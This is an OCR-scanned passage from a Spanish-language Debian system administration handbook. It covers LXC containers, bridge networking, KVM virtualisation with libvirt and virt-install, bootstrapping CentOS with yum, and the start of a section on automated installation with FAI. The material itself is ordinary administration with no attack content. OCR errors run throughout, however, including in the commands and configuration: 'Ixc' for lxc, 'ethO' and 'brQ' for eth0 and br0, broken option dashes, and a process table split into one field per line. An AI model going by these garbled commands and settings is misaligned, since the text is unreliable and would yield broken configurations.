dores  LXC  es  mas  complejo  que  simplemente  ejecutar  debian-installer  en  una  maquina  virtual. 
Describiremos  unos  pocos  prerequisites  y  luego  continuaremos  con  la  configuracion  de  red;  fi- 
nalmente  podremos  crear  realmente  el  sistema  a  ejecutar  en  el  contenedor. 


Pasos  preliminares 

El  paquete  Ixc  contiene  las  herramientas  necesarias  para  utilizar  LXC,  por  lo  tanto  debe  instalar- 
lo. 

LXC  tambien  necesita  del  sistema  de  configuracion  de  grupos  de  control  («control  groups»),  que  es 
un  sistema  de  archivos  virtual  montado  en/sys/fs/cgroup.  Desde  que  Debian  8  se  ha  cambiado 
a  systemd,  el  cual  confia  tambien  en  los  grupos  de  control,  eso  ya  se  ha  hecho  automaticamente 
en  el  momento  de  arranque  sin  necesidad  de  configuraciones  adicionales. 


Configuracion  de  red 

El  objetivo  de  instalar  LXC  es  configurar  maquinas  virtuales;  si  bien  podriamos  mantenerlas 
aisladas  de  la  red,  y  solo  comunicarnos  con  ellas  a  traves  del  sistema  de  archivos,  la  mayoria  de 
los  casos  de  uso  involucran  proveer  a  los  contenedores  al  menos  un  acceso  minimo  a  la  red.  En  el 
caso  tipico,  cada  contenedor  obtendra  una  interfaz  de  red  virtual,  conectada  a  la  red  real  a  traves 
de  un  puente.  Esta  interfaz  virtual  puede  conectarse  directamente  a  la  interfaz  de  red  fisica  del 
anfitrion  (en  cuyo  caso  el  contenedor  se  encuentra  en  la  red  directamente)  o  a  otra  interfaz 
virtual  definida  en  el  anfitrion  (y  en  la  que  este  puede  filtrar  o  enrutar  trafico).  En  ambos  casos, 
necesitara  el  paquete  bridge-utils. 

El  caso  mas  simple  es  solo  cuestion  de  editar  /etc/network/interfaces,  moviendo  la  configu¬ 
racion  de  la  interfaz  fisica  (por  ejemplo  etho)  a  la  interfaz  bridge  (generalmente  brO)  y  configurar 
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un  enlace  entre  ellas.  Por  ejemplo,  si  el  archivo  de  configuracion  de  la  interfaz  de  red  inicialmen- 
te  contiene  elementos  como  los  siguientes: 

auto  ethO 

iface  ethO  inet  dhcp 

Deberfa  desactivarlas  y  reemplazarlas  con  lo  siguiente: 

#auto  ethO 

#iface  ethO  inet  dhcp 
auto  brO 

iface  br0  inet  dhcp 
bridge-ports  ethO 

El  efecto  de  esta  configuracion  sera  similar  a  lo  que  podrfa  obtener  si  los  controladores  fueran 
maquinas  conectadas  a  la  misma  red  fisica  que  el  anfitrion.  La  configuracion  del  «puente»  ges- 
tiona  el  transito  de  tramas  Ethernet  entre  todas  las  interfaces  en  el,  lo  que  incluye  la  interfaz 
fisica  ethO  asi  como  tambien  las  interfaces  definidas  para  los  contenedores. 

En  casos  en  los  que  no  pueda  utilizar  esta  configuracion  (por  ejemplo,  si  no  puede  asignarle 
una  IP  publica  a  los  contenedores),  crearemos  una  sola  interfaz  virtual  tap  y  la  conectaremos  al 
puente.  La  topologia  de  red  equivalente  seria  aquella  de  un  equipo  con  una  segunda  tarjeta  de 
red  conectada  a  un  switch  independiente  al  que  tambien  estan  conectados  los  contenedores.  El 
anfitrion  debera  actuar  como  puerta  de  enlace  para  los  contenedores  si  estos  deben  comunicarse 
con  el  mundo  exterior. 

Ademas  de  bridge-utils,  esta  configuracion  «enriquecida»  necesita  el  paquete  vde2;  el  archivo 
/etc/network/interfaces  se  convierte  entonces  en: 

#  Interfaz  ethO  sin  cambios 
auto  ethO 

iface  ethO  inet  dhcp 

#  Interfaz  virtual 
auto  tapO 

iface  tapO  inet  manual 
vde2-switch  -t  tapO 

#  Puente  para  los  contenedores 
auto  brO 

iface  brO  inet  static 
bridge-ports  tapO 
address  10.0.0.1 
netmask  255.255.255.0 

Luego  puede  configurar  la  red  en  los  contenedores  de  forma  estatica  o  dinamica  con  un  servidor 
DHCP  ejecutando  en  el  anfitrion.  Debera  configurar  este  servidor  DHCP  para  que  responda  a 
pedidos  en  la  interfaz  brO. 
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Configuration  del  sistema 


Configuremos  ahora  el  sistema  que  utilizara  el  contenedor.  Debido  a  que  esta  «maquina  virtual)) 
no  ejecutara  directamente  sobre  el  hardware,  son  necesarios  algunos  ajustes  comparados  con  un 
sistema  de  archivos  estandar,  especialmente  en  aquello  que  involucra  al  nucleo,  los  dispositivos 
y  las  consolas.  Afortunadamente,  el  paquete  Ixc  incluye  scripts  que  automatizan  la  mayoria  de 
esta  configuracion.  Por  ejemplo,  las  siguientes  ordenes  (que  requieren  los  paquetes  debootstrap 
y  rsync)  instalara  un  contenedor  Debian: 

root@mirwiz : ~#  Ixc-create  -n  testlxc  -t  debian 

debootstrap  is  /usr/sbin/debootstrap 

Checking  cache  download  in  /var/cache/lxc/debian/rootfs- jessie-amd64  ... 

Downloading  debian  minimal  .  .  . 

I:  Retrieving  Release 
I:  Retrieving  Release. gpg 

[...] 

Download  complete. 

Copying  rootfs  to  /var/lib/lxc/testlxc/rootfs... 

[...] 

Root  password  is  'sSiKhMzI',  please  change  ! 
root@mirwiz : ~# 


Sepa  que  inicialmente  se  crea  el  sistema  de  archivos  en  /var/cache/lxc  y  luego  es  mudado  a 
su  directorio  de  destino.  Esto  permite  crear  contenedores  identicos  mucho  mas  rapido  ya  que 
luego  solo  necesita  copiarlo. 

Tenga  en  cuenat  que  el  script  de  creacion  de  plantillas  acepta  la  opcion  -  -  arch  para  especifi- 
car  la  arquitectura  del  sistema  a  instalar  y  la  opcion  -  -  release  si  desea  instalar  algo  diferente 
a  la  version  estable  actual  de  Debian.  Tambien  puede  definir  la  variable  de  entorno  MIRROR 
apuntando  a  una  replica  Debian  local. 

El  sistema  de  archivos  recientemente  creado  ahora  contiene  un  sistema  Debian  minimo  y,  de 
forma  predeterminada,  el  contenedor  no  tendra  interfaz  de  red  (con  el  permiso  de  la  interfaz 
local  de  loopback).  Debido  a  que  esta  no  es  la  configuracion  deseada,  editaremos  el  archivo  de 
configuracion  del  contenedor  (/va  r/lib/lxc/testlxc/conf  ig)  y  agregar  algunos  elementos 
Ixc. network.*: 

Ixc . network. type  =  veth 

Ixc . network. flags  =  up 

Ixc . network. link  =  brQ 

Ixc . network. hwaddr  =  4a : 49 : 43 : 49 : 79 : 20 


Estas  lineas  significan,  respectivamente,  que  se  creara  una  interfaz  virtual  en  el  contenedor; 
que  sera  iniciada  automaticamente  cuando  inicie  el  contenedor;  que  sera  conectada  automati- 
camente  al  puente  brO  en  el  anfitrion;  y  que  su  direccion  MAC  sera  la  especificada.  En  caso  que 
esta  ultima  linea  no  exista  o  este  desactivada,  se  generara  una  direccion  MAC  aleatoria. 
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Otro  elemento  util  en  dicho  archivo  es  la  configuracion  del  nombre  del  equipo: 

Ixc.utsname  =  testlxc 


Inicio  del  contenedor 

Ahora  que  nuestra  maquina  virtual  esta  lista,  iniciemos  el  contenedor: 

root@mirwiz :~#  Ixc-start  --daemon  - -name=testlxc 
root@mirwiz :~#  Ixc-console  -n  testlxc 
Debian  GNU/Linux  8  testlxc  ttyl 

testlxc  login:  root 
Password : 

Linux  testlxc  3 . 16 . 0-4-amd64  #1  SMP  Debian  3 . 16 . 7-cktll- 1  (2015-05-24)  x86_64 

The  programs  included  with  the  Debian  GNU/Linux  system  are  free  software; 
the  exact  distribution  terms  for  each  program  are  described  in  the 
individual  files  in  /usr/share/doc/*/copyright . 

Debian  GNU/Linux  comes  with  ABSOLUTELY  NO  WARRANTY,  to  the  extent 
permitted  by  applicable  law. 
root@testlxc : -#  ps  auxwf 


USER 

PID 

%:pu 

3MEM 

VSZ 

RSS 

TTY 

STAT 

START 

TIME 

COMMAND 

root 

1 

0.0 

0.2 

28164 

4432 

? 

Ss 

17:33 

0:00 

/sbin/init 

root 

20 

0.0 

0.1 

32960 

3160 

? 

Ss 

17:33 

0:00 

/lib/systemd/systemd- j  ournald 

root 

82 

0.0 

0.3 

55164 

5456 

? 

Ss 

17:34 

0:00 

/usr/sbin/sshd  -D 

root 

87 

0.0 

0.1 

12656 

1924 

tty2 

Ss+ 

17:34 

0:00 

/sbin/agetty  --noclear  tty2 

linux 

root 

88 

0.0 

0.1 

12656 

1764 

tty3 

Ss+ 

17:34 

0:00 

/sbin/agetty  --noclear  tty3 

linux 

root 

89 

0.0 

0.1 

12656 

1908 

tty4 

Ss+ 

17:34 

0:00 

/sbin/agetty  --noclear  tty4 

linux 

root 

90 

0.0 

0.1 

63300 

2944 

ttyl 

Ss 

17:34 

0:00 

/bin/login  -- 

root 

117 

0.0 

0.2 

21828 

3668 

ttyl 

S 

17:35 

0:00 

\  -bash 

root 

268 

0.0 

0.1 

19088 

2572 

ttyl 

R+ 

17:39 

0:00 

\  ps  auxfw 

root 

91 

0.0 

0.1 

14228 

2356 

console 

Ss+ 

17:34 

0:00 

/sbin/agetty  --noclear  --keep 

baud  console 

115200  38400 

9600 

vtl02 

root 

197 

0.0 

0.4 

25384 

7640 

? 

Ss 

17:38 

0:00 

dhclient  -v  -pf  /run/dhclient 

eth0 . pid 

-If 

/var/lib/dhcp/dhclient . e 

root 

266 

0.0 

0.1 

12656 

1840 

? 

Ss 

17:39 

0:00 

/sbin/agetty  --noclear  tty5 

linux 

root 

267 

0.0 

0.1 

12656 

1928 

? 

Ss 

17:39 

0:00 

/sbin/agetty  --noclear  tty6 

*+  linux 
rootiatestlxc :  -# 


Ahora  estamos  dentro  del  contenedor;  nuestro  acceso  a  los  procesos  esta  restringido  a  aquellos 
iniciados  dentro  del  mismo  contenedor  y  nuestro  acceso  al  sistema  de  archivos  esta  limitado 
de  forma  similar  al  subconjunto  dedicado  del  sistema  de  archivos  completo  (/var/lib/lxc/ 
testlxc/ rootfs).  Podemos  salir  a  la  consola  con  Control+a  q. 

Tenga  en  cuenta  que  ejecutamos  el  contenedor  como  un  proceso  en  segundo  piano  gracias  a  la 
opcion  -  -  daemon  de  Ixc-start.  Podemos  interrumpir  el  contenedor  ejecutando  Ixc-stop  -  - 
name=testlxc. 

El  paquete  Ixc  contiene  un  script  de  inicializacion  que  puede  automatizar  el  inicio  de  uno  o  mas 
contenedores  cuando  el  sistema  principal  arranca  (confia  en  el  comando  Ixc  -  autosta  rt  el  cual 
inicia  los  contenedores  que  tienen  la  opcion  Ixc. start. auto  configurada  a  l).  Se  puede  obtener  un 
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control  mas  detallado  del  orden  de  inicio  con  Ixc. start. order  y  Ixc.group:  por  defecto,  el  script  de 
inicializacion  inicia  los  contenedores  que  son  parte  del  grupo  onboot  y  luego  los  contenedores 
que  no  forman  parte  de  este  grupo.  En  ambos  casos  el  orden  dentro  de  un  grupo  es  definido  por 
la  opcion  Ixc. start. order. 


YENDOMAsallA  Debido  a  que  LXC  es  un  sistema  de  aislacion  muy  liviano,  puede  adaptarse  parti- 
Virtualizacion  en  masa  cularmente  al  almacenamiento  masivo  de  servidores  virtuales.  La  configuracion  de 

red  probablemente  sea  un  poco  mas  avanzada  que  la  que  describimos,  pero  la  con¬ 
figuracion  «enriquecida»  utilizando  interfaces  tap  y  veth  deberia  ser  suficiente  en 
muchos  casos. 

Tambien  puede  tener  sentido  compartir  parte  del  sistema  de  archivos,  como  los 
subarboles  /usr  y  /lib  para  evitar  duplicar  el  software  que  puede  ser  comun  a 
varios  contenedores.  Generalmente  se  consigue  esto  con  elementos  Ixc. mount, 
entry  en  el  archivo  de  configuracion  de  los  contenedores.  Un  efecto  secundario 
interesante  es  que  el  proceso  utilizara  menos  memoria  ffsica  ya  que  el  nucleo  pue¬ 
de  detectar  que  se  comparten  los  programas.  El  costo  marginal  de  un  contenedor 
adicional  se  puede  reducir  al  espacio  en  disco  dedicado  a  sus  datos  especificos  y 
unos  pocos  procesos  adicionales  que  el  nucleo  debe  gestionar  y  programar. 

Obviamente,  no  describimos  todas  las  opciones  disponibles;  puede  obtener  informa- 
cion  mas  completa  en  las  paginas  de  manual  Ixc  (7)  y  Ixc. container. conf(5) 
asi  como  tambien  aquellas  a  las  que  hacen  referencia. 


12.2.3.  Virtualizacion  con  KVM 

KVM,  acronimo  de  maquina  virtual  basada  en  el  nucleo  («Kernel-based  Virtual  Machine»),  es  pri- 
mero  que  nada  un  modulo  del  nucleo  que  provee  la  mayor  parte  de  la  infraestructura  que  puede 
usar  un  virtualizador,  pero  no  es  un  virtualizador  en  si  mismo.  El  control  real  de  la  virtualiza¬ 
cion  es  gestionado  por  una  aplicacion  basada  en  QEMU.  No  se  preocupe  si  esta  seccion  menciona 
programas  qemu-*,  continua  hablando  sobre  KVM. 

A  diferencia  de  otros  sistemas  de  virtualizacion,  se  integro  KVM  al  nucleo  Linux  desde  el  co- 
mienzo.  Sus  desarrolladores  eligieron  aprovechar  el  conjunto  de  instrucciones  de  procesador 
dedicados  a  la  virtualizacion  (Intel-VT  y  AMD-V),  lo  que  mantiene  a  KVM  liviano,  elegante  y  no 
muy  hambriento  de  recursos.  La  contraparte,  obviamente,  es  que  KVM  no  funciona  en  ordena- 
dores  con  procesadores  distintos  a  estos.  Para  los  ordenadores  basados  en  i386  y  amd64,  puede 
verificar  si  tiene  uno  de  estos  procesadores  si  encuentra  a  «vmx»  o  «svm»  entre  las  opciones  de 
CPU  («flags»)  enumeradas  en  /proc/cpuinfo. 

Con  Red  Hat  respaldando  activamente  su  desarrollo,  KVM  parece  haberse  convertido  en  la  refe¬ 
rencia  de  virtualizacion  en  Linux. 


Pasos  preliminares 

A  diferencia  de  herramientas  como  VirtualBox,  KVM  por  si  mismo  no  incluye  ninguna  interfaz 
de  usuario  para  crear  y  administrar  maquinas  virtuales.  El  paquete  qemu-kvm  solo  provee  un  eje- 
cutable  para  iniciar  maquinas  virtuales  asi  como  el  script  de  inicializacion  que  carga  los  modulos 
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de  nucleo  apropiados. 

Afortunadamente,  Red  Hat  tambien  provee  otro  conjunto  de  herramientas  para  solucionar  es- 
te  problema  con  el  desarrollo  de  la  biblioteca  libvirt  y  las  herramientas  gestor  de  maquina  virtual 
(«virtual  machine  manager»)  asociadas.  libvirt  permite  administrar  maquinas  virtuales  de  ma- 
nera  uniforme  e  independiente  al  sistema  de  virtualization  subyacente  (actualmente  es  compa¬ 
tible  con  QEMU,  KVM,  Xen,  LXC,  OpenVZ,  VirtualBox,  VMWare  y  UML).  virtual-manager  es 
una  interfaz  grafica  que  utiliza  libvirt  para  crear  y  administrar  maquinas  virtuales. 

Primero  instalaremos  los  paquetes  necesarios  con  apt -get  install  qemu-kvm  libvirt -bin 
virtinst  virt  -  manager  virt- viewer,  libvirt-bin  provee  eldemonio  libvirtd,  que  permite  la 
gestion  (posiblemente  remota)  de  maquinas  virtuales  ejecutando  en  el  equipo  e  inicia  las  VMs 
necesarias  cuando  este  inicia.  Ademas,  este  paquete  provee  la  herramienta  de  consola  virsh 
que  permite  controlar  los  equipos  administrados  con  libvirtd. 

El  paquete  virtinst  provee  virt-install,  que  permite  crear  maquinas  virtuales  desde  una  con- 
sola.  Finalmente,  virt-viewer  permite  acceder  a  la  consola  grafica  de  una  VM. 


Configuration  de  red 

De  la  misma  forma  que  en  Xen  y  LXC,  la  configuracion  de  red  mas  frecuente  involucra  un  puente 
que  agrupa  las  interfaces  de  red  de  las  maquinas  virtuales  (revise  la  Seccion  12.2.2.2,  «Configu- 
racion  de  red»  pagina  35l). 

Alternativamente,  y  de  forma  predeterminada  en  la  configuracion  de  KVM,  se  le  asigna  una 
direction  privada  (en  el  rango  192.168.122.0/24)  a  la  maquina  virtual  y  se  configura  NAT  para 
que  la  VM  pueda  acceder  a  la  red  externa. 

El  resto  de  esta  seccion  asume  que  el  anfitrion  posee  una  interfaz  fisica  ethO  y  un  puente  brO  que 
esta  conectado  a  la  primera  interfaz. 


Instalacion  con  virt-install 

Crear  una  maquina  virtual  es  muy  similar  a  instalar  un  sistema  normal,  excepto  que  describira 
las  caracteristicas  de  la  maquina  virtual  en  una  linea  que  parecera  infinita. 

En  la  practica,  esto  significa  que  utilizaremos  el  instalador  de  Debian,  iniciando  la  maquina  vir¬ 
tual  en  un  dispositivo  DVD-ROM  virtual  que  esta  asociado  con  la  imagen  del  DVD  Debian  almace- 
nado  en  el  sistema  anfitrion.  La  VM  exportara  su  consola  grafica  sobre  el  protocolo  VNC  (revise 
la  Seccion  9.2.2,  utilization  de  escritorios  graficos  remotos»  pagina  208  para  mas  detalles),  lo 
que  nos  permitira  controlar  el  proceso  de  instalacion. 

Primero  necesitaremos  indicarle  a  libvirtd  donde  almacenar  las  imagenes  de  disco,  a  menos  que 
la  ubicacion  predeterminada  (/var/lib/libvirt/images)  sea  adecuada. 
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root@mirwiz : ~#  mkdir  /srv/kvm 

root@mirwiz : ~#  virsh  pool-create-as  srv-kvm  dir  --target  /srv/kvm 

Pool  srv-kvm  created 
root@mirwiz : ~# 


CONSEJO  En  todos  los  ejemplos  de  esta  seccion  se  da  por  hecho  que  Ud.  esta  ejecutando  los 

Anada  su  usuario  al  comandos  como  root.  Efectivamente,  si  quiere  controlar  el  demonio  local  libvirt,  ne- 

grupo  libvirt  cesitara  ser  root  o  ser  un  miembro  del  grupo  libvirt  (lo  cual  no  viene  por  defecto). 

POr  tanto,  si  quiere  evitar  usar  permisos  de  root  muy  a  menudo,  puede  anadirse  al 
grupo  libvirt  y  ejecutar  los  distintos  comandos  bajo  su  identidad. 


Ahora  iniciaremos  el  proceso  de  instalacion  para  la  maquina  virtual  y  veremos  en  mas  detalle 
las  opciones  mas  importantes  de  virt-  in  stall.  Este  programa  registra  en  libvirtd  la  maquina 
virtual  y  sus  parametros  y  luego  la  inicia  para  continuar  el  proceso  de  instalacion. 

#  virt-install  --connect  qemu: ///system  O 
--virt-type  kvm  o 

--name  testkvm  0 

--ram  1024  O 

- -disk  /srv/kvm/testkvm . qcow, format=qcow2 , size=10  o 
--cdrom  /srv/isos/debian-8 . 1 . 0-amd64-netinst . iso  © 

--network  bridge=brO  © 

--vnc  © 

--os-type  linux  © 

--os-variant  debianwheezy 

Starting  install... 

Allocating  'testkvm. qcow'  |  10  GB 

Creating  domain...  |  0  B 

Guest  installation  complete...  restarting  guest. 


00:00 

00:00 


©  La  opcion  —connect  especifica  el  «hypervisor»  a  utilizar.  En  forma  de  una  URL  que  contie- 

ne  un  sistema  de  virtualizacion  (xen://,  qemu://,  Ixc: //,  openvz://,  vbox://,  etc.)  y  el  equipo 
que  alojara  la  VM  (puede  dejarlo  vacio  si  es  el  equipo  local).  Ademas,  y  en  el  caso  de  QE- 
MU/KVM,  cada  usuario  puede  administrar  maquinas  virtuales  con  permisos  restringidos, 
y  la  ruta  de  la  URL  permite  diferenciar  equipos  de  «sistema»  (/system)  de  los  demas  (/ 
session). 

©  Debido  a  que  se  administra  KVM  de  la  misma  forma  que  QEMU,  la  opcion  —virt-type  kvm 
permite  especificar  que  se  utilice  KVM  aunque  la  URL  parezca  una  de  QEMU. 

O  La  opcion  —name  define  un  nombre  (unico)  para  la  maquina  virtual. 

©  La  opcion  —ram  permite  especificar  la  cantidad  de  RAM  (en  MB)  que  reservar  para  la  ma¬ 

quina  virtual. 
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©  La  opcion  -disk  especifica  la  ubicacion  del  archivo  de  imagen  que  representara  el  disco 
duro  de  nuestra  maquina  virtual;  se  creara  este  archivo,  a  menos  que  ya  exista,  de  un 
tamano  (en  GB)  especificado  por  el  parametro  size.  El  parametro  format  permite  elegir 
entre  las  diferentes  formas  de  almacenar  el  archivo  de  imagen.  El  formato  predetermina- 
do  (raw)  es  un  solo  archivo  de  exactamente  el  mismo  tamano  y  contenidos  que  el  disco. 
Seleccionamos  un  formato  mas  avanzado  aquf,  especifico  de  QEMU  y  que  permite  iniciar 
con  un  archivo  pequeno  que  solo  crece  cuando  la  maquina  virtual  realmente  utiliza  el 
espacio. 

©  Utilizamos  la  opcion  -cdrom  para  indicar  donde  encontrar  el  disco  optico  a  utilizar  para 
la  instalacion.  La  ruta  puede  ser  una  ruta  local  para  un  archivo  ISO,  una  URL  donde  se 
puede  obtener  el  archivo  o  el  archivo  de  dispositivo  de  un  CD-ROM  fisico  (es  decir:  /dev/ 
cdrom). 

G  La  opcion  -network  especifica  como  se  integra  la  tarjeta  de  red  virtual  a  la  configuracion 
de  red  del  anfitrion.  El  comportamiento  predeterminado  (que  forzamos  explicitamente 
en  nuestro  ejemplo)  es  integrarla  en  un  puente  de  red  preexistente.  Si  no  existe  dicho 
puente,  la  maquina  virtual  solo  llegara  a  la  red  fisica  mediante  NAT,  por  lo  que  se  asignara 
una  direccion  en  el  rango  de  subredes  privadas  (192.168.122.0/24). 

©  — vnc  indica  que  debe  estar  disponible  la  consola  grafica  a  traves  de  VNC.  El  comporta¬ 

miento  predeterminado  para  el  servidor  VNC  es  solo  escuchar  en  la  interfaz  local;  si  debe 
ejecutar  el  cliente  VNC  en  otro  equipo,  necesitara  establecer  un  tunel  SSH  (revise  la  Sec- 
cion  9. 2. 1.3,  «Creacion  de  tuneles  cifrados  con  redireccion  de  puertos»  pagina  206)  para 
poder  establecer  una  conexion.  Alternativamente,  puede  utilizar  — vnclisten=0. 0.0.0  para 
poder  acceder  al  servidor  VNC  desde  todas  las  interfaces;  sepa  que  si  hace  esto,  realmente 
debe  disenar  su  firewall  de  forma  acorde. 

©  Las  opciones  —os-type  y  —os-variant  permiten  optimizar  unos  pocos  parametros  de  la 
maquina  virtual  basado  en  caracteristicas  conocidas  del  sistema  operativo  mencionado 
en  ellas. 


En  este  punto,  la  maquina  virtual  esta  ejecutando  y  necesitaremos  conectarnos  a  la  consola  gra¬ 
fica  para  continuar  con  el  proceso  de  instalacion.  Si  realizo  la  operacion  anterior  de  un  entorno 
de  escritorio  grafico,  esta  conexion  deberia  iniciar  automaticamente.  De  lo  contrario,  o  si  esta- 
mos  trabajando  de  forma  remota,  puede  ejecutar  vi  rt  -  viewe  r  desde  cualquier  entorno  grafico 
para  abrir  la  consola  grafica  (sepa  que  le  pedira  la  contrasena  de  root  del  equipo  remoto  dos 
veces  ya  que  esta  operacion  necesita  dos  conexiones  SSH): 

$  virt-viewer  --connect  qemu+ssh://root@servidor/system  testkvm 

root@servidor  password: 
root@servidor's  password: 

Cuando  finaliza  el  proceso  de  instalacion,  se  reinicia  la  maquina  virtual  y  esta  lista  para  que  la 
utilice. 
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Administration  de  maquinas  con  virsh 

Ahora  que  finalizo  la  instalacion,  veamos  como  gestionar  las  maquinas  virtuales  disponibles.  Lo 
primero  a  intentar  es  pedirle  a  libvirtd  la  lista  de  maquinas  virtuales  que  administra: 

#  virsh  -c  qemu : ///system  list  --all 

Id  Name  State 

-  testkvm  shut  off 

Iniciemos  nuestra  maquina  virtual  de  pruebas: 

#  virsh  -c  qemu : ///system  start  testkvm 

Domain  testkvm  started 

Ahora  podemos  obtener  las  instrucciones  de  conexion  para  la  consola  grafica  (puede  pasar  como 
parametro  de  vncviewer  la  pantalla  VNC  devuelta): 

#  virsh  -c  qemu : ///system  vncdisplay  testkvm 

:  0 

Entre  otras  subordenes  disponibles  en  virsh  encontraremos: 

■  reboot  para  reiniciar  una  maquina  virtual; 

■  shutdown  para  apagarla  de  forma  segura; 

■  destroy,  para  detenerla  brutalmente; 

■  suspend  para  pausarla; 

■  resume  para  continuar  su  ejecucion; 

■  autostart  para  activar  (o  desactivar  con  la  opcion  — d  isable)  que  se  inicie  la  maquina  virtual 
automaticamente  cuando  inicia  el  anfitrion; 

■  undefine  para  eliminar  todo  rastro  de  la  maquina  virtual  en  libvi  rtd. 

Todas  estas  subordenes  aceptan  un  identificador  de  maquina  virtual  como  parametro. 


Instalacion  de  un  sistema  basado  en  RPM  sobre  Debian  con  yum 

Si  pretende  que  la  maquina  virtual  ejecute  Debian  (o  uno  de  sus  derivados),  puede  inicializar 
el  sistema  con  debootstrap  como  se  describio  anteriormente.  Pero  desea  instalar  un  sistema 
basado  en  RMP  en  la  maquina  virtual  (como  Fedora,  CentOS  o  Scientific  Linux),  necesita  realizar 
la  configuracion  con  la  aplicacion  yum  (disponible  en  el  paquete  del  mismo  nombre). 

El  procedimiento  require  usar  rpm  para  extraer  un  conjunto  inicial  de  archivos,  incluyendo  pro- 
bablemente  bastantes  archivos  de  configuracion  de  yum,  y  luego  ejecutar  el  comando  yum  para 
descomprimir  el  conjunto  de  paquetes  restantes.  Pero  desde  que  podemos  llamar  a  yum  desde 
fuera  de  unajaula  chroot,  necesitaremos  algunos  cambios  provisionales.  En  los  ejemplos  siguien- 
tes,  el  destino  de  chroot  es  /s  rc/centos. 
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#  rootdir="/srv/centos" 

#  mkdir  -p  ”$rootdir”  /etc/rpm 

#  echo  "%_dbpath  /var/lib/rpm"  >  /etc/rpm/macros . dbpath 

#  wget  http: //mirror . centos . org/centos/7/os/x86_64/Packages/centos -  release-7- 1 . 1503. 

el7.centos.2.8.x86_64.  rpm 

#  rpm  --nodeps  --root  "$rootdir”  -i  centos-release-7-1.1503.el7.centos.2.8.x86_64. rpm 

rpm:  RPM  should  not  be  used  directly  install  RPM  packages,  use  Alien  instead! 
rpm:  However  assuming  you  know  what  you  are  doing... 

warning:  centos- release-7- 1 . 1503 . el7 . centos . 2 . 8 . x86  64 . rpm :  Header  V 3  RSA/SHA256 
Signature,  key  ID  f4a80eb5:  NOKEY 

#  sed  -i  -e  ”s,gpgkey=file:///etc/,gpgkey=file://${rootdir}/etc/,g"  $rootdir/etc/yum . 

repos .  d/* .  repo 

#  yum  --assumeyes  - -installroot  $rootdir  groupinstall  core 

[...] 

#  sed  -i  -e  ”s,gpgkey=file://${rootdir}/etc/,gpgkey=file:///etc/,g"  $rootdir/etc/yum . 

repos .  d/* .  repo 


12.3.  Instalacion  automatizada 

Los  administradores  de  Falcot  Corp,  como  muchos  administradores  de  grandes  servicios  IT,  ne- 
cesitan  herramientas  para  instalar  (o  reinstalar)  rapidamente,  y  automaticamente  si  es  posible, 
nuevas  maquinas. 

Un  amplio  rango  de  soluciones  pueden  satisfacer  estos  requisites.  Por  el  otro  lado,  herramientas 
genericas  como  Systemlmager  lo  hacen  creando  una  imagen  basada  en  una  maquina  patron  y 
luego  desplegando  dicha  imagen  en  los  sistemas  objetivo;  en  el  otro  extremo  del  espectro,  el  ins- 
talador  Debian  estandar  puede  ser  presembrado  con  un  archivo  de  configuracion  que  provee  las 
respuestas  a  las  preguntas  realizadas  durante  el  proceso  de  instalacion.  Como  un  tipo  de  punto 
medio,  una  herramienta  hibrida  como  FAI  (instalador  completamente  automatico:  «Fully  Automatic 
Installer»)  instala  los  equipos  con  el  sistema  de  paquetes,  pero  tambien  utiliza  su  propia  infraes- 
tructura  para  tareas  mas  especificas  de  despliegues  masivos  (como  inicializacion,  particionado, 
configuracion,  etc). 

Cada  una  de  estas  herramientas  tiene  sus  ventajas  y  desventajas:  Systemlmager  funciona  inde- 
pendientemente  de  cualquier  sistema  de  paquetes  particular,  lo  que  permite  gestionar  grandes 
conjuntos  de  maquinas  que  utilizan  diferentes  distribuciones  Linux.  Tambien  incluye  un  siste¬ 
ma  de  actualizacion  que  no  necesita  una  reinstalacion,  pero  solo  puede  confiar  en  este  sistema 
de  actualizacion  si  no  se  modifican  las  maquinas  de  forma  independiente;  en  otras  palabras, 
el  usuario  no  debe  actualizar  ningun  software  por  su  cuenta  ni  instalar  otro  software.  De  for¬ 
ma  similar,  no  se  debe  automatizar  las  actualizaciones  de  seguridad  porque  estos  deben  pasar 
por  la  imagen  de  referencia  centralizada  que  administra  Systemlmager.  Esta  solucion  tambien 
requiere  que  las  maquinas  objetivo  sean  homogeneas,  de  lo  contrario  necesitara  mantener  y 
administrar  diferentes  imagenes  (no  podra  utilizar  una  imagen  i386  en  una  maquina  powerpc, 
etc.). 
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Por  el  otro  lado,  puede  adaptar  la  instalacion  automatizada  con  debian-installer  a  cada  maquina 
especifica:  el  instalador  obtendra  el  nucleo  y  los  paquetes  de  software  apropiados  de  los  repo¬ 
sitories  relevantes,  detectara  el  hardware  disponible,  particionara  el  disco  duro  completo  para 
aprovechar  todo  el  espacio  disponible,  instalara  el  sistema  Debian  correspondiente  y  configura- 
ra  el  gestor  de  arranque  adecuado.  Sin  embargo,  el  instalador  estandar  solo  instalara  versiones 
de  Debian  estandar,  con  el  sistema  base  y  un  subconjunto  de  «tareas»  preseleccionadas;  esto 
no  permite  instalar  un  sistema  particular  con  aplicaciones  no  empaquetadas.  Satisfacer  esta 
necesidad  particular  requerira  modificar  el  instalador...  afortunadamente  el  instalador  es  muy 
modular  y  existen  herramientas  para  automatizar  la  mayor  parte  del  trabajo  necesario  para  esta 
personalizacion,  la  mas  importante  siendo  simple-CDD  (CDD  es  acronimo  de  derivado  personaliza- 
do  de  Debian:  «Custom  Debian  Derivative))).  Inclusive  la  solucion  simple-CDD,  sin  embargo,  solo 
gestiona  la  instalacion  inicial;  lo  que  no  es  un  problema  generalmente  ya  que  las  herramientas 
de  APT  permite  desplegar  actualizaciones  de  forma  eficiente  mas  adelante. 

Solo  haremos  una  revision  general  de  FAI  y  saltearemos  Systemlmager  por  completo  (ya  no  se 
encuentra  en  Debian),  para  poder  enfocarnos  mas  intensamente  en  debian-installer  y  simple- 
CDD,  que  son  mas  interesantes  en  un  contexto  solo  con  Debian. 


12.3.1.  Instalador  completamente  automatico  (FAI:  « Ful ly  Automatic  I nstal ler») 

Fully  Automatic  Installer  es  probablemente  el  sistema  de  despliegue  automatico  para  Debian  mas 
antiguo,  lo  que  explica  su  estado  como  referencia;  pero  su  naturaleza  flexible  compensa  su  com- 
plejidad. 

FAI  necesita  un  sistema  servidor  para  almacenar  la  informacion  de  despliegue  y  permitir  que 
las  maquinas  objetivo  arranquen  desde  la  red.  Este  servidor  necesita  el  paquet efai-server  (o  fai- 
quickstart,  que  tambien  incluye  los  elementos  necesarios  para  una  configuracion  estandar). 

FAI  utiliza  un  enfoque  especifico  para  definir  los  varios  perfiles  instalables.  En  lugar  de  simple- 
mente  duplicar  una  instalacion  de  referencia,  FAI  es  un  instalador  completo,  totalmente  confi¬ 
